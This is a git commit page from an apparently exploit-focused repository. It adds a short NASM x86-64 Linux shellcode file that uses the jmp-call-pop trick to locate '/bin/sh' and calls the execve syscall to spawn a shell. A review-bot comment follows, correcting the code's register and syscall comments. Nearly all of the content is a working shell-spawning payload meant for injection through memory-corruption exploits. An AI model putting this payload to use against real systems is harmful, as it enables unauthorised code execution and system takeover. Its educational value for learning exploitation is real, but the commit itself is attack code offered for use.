authortoni <matzeton@googlemail.com>2015-04-12 17:21:18 +0200
committertoni <matzeton@googlemail.com>2015-04-12 17:21:18 +0200
commitbd18cd8c67fd97f6bf0dceffae68799730ec582c (patch)
tree43adc08e921768ac116c205444a2a6050199d245 /shellcode/execve_x64.asm
parent48ed2c30cac4c144690ddf5e56c6b366636184f0 (diff)
exploiting x64's as well
Diffstat (limited to 'shellcode/execve_x64.asm')
-rw-r--r--shellcode/execve_x64.asm20
1 files changed, 20 insertions, 0 deletions
diff --git a/shellcode/execve_x64.asm b/shellcode/execve_x64.asm
new file mode 100644
index 0000000..6048796
--- /dev/null
+++ b/shellcode/execve_x64.asm
@@ -0,0 +1,20 @@
+BITS 64
+
+
+; do the 'string trick'
+jmp short string
+
+code:
+xor rax,rax
+pop rdi ; pop the addr of the string intro esi (stack pointer register)
+mov byte [rdi + 7], al ; null-terminate the string
+push rdi
+mov rsi,rsp
+push rax
+mov rdx,rsp
+mov byte al,59 ; execv
+syscall
+
+string:
+call code
+db '/bin/sh' , 0xFF
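Review bot: The comment on `pop rdi` names the wrong register and misdescribes it: the popped value goes into `rdi` (the first syscall-argument register under the Linux x86-64 convention), not `esi`, and neither register is a stack pointer; `; rdi = address of the string (1st argument)` says what the line does. The comment on `mov byte al,59` is also off, since number 59 on x86-64 Linux is the `execve` syscall (`execv` is a libc wrapper, not a syscall), and the `byte` size keyword is redundant on a register destination, so `mov al, 59 ; SYS_execve (x86-64 Linux)` is the conventional form. The file never states its assembler syntax or target; a one-line header such as `; NASM syntax, Linux x86-64 raw syscall interface` would let a reader check the register assignments against the right ABI.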